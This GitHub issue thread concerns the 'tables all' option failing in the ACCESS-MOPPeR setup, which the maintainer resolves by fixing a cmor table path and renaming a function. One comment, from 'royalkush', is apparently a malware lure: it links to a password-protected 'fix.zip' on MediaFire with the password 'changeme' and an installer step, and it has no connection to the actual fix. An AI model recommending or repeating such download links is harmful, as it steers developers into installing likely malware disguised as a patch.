### ISSUE TITLE
tables all option not working

### ISSUE THREAD

**Issue by paolap** [ACCESS-Community-Hub/ACCESS-MOPPeR#169]
In mop setup passing tables all in config file is currently not working, at least not with custom mode.
A reasonable workflow for this would be to preselect all the tables in the map file to limit how many tables are processed.

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paolap** [comment]
Changed find_custom_tables to find_map_tables, with new functionality. The previous issue was due to using the wrong path for the cmor tables, it was ignoring the compiled data

**Comment by paolap** [comment]
This is resolved in the branch tables, will push this to pre_release
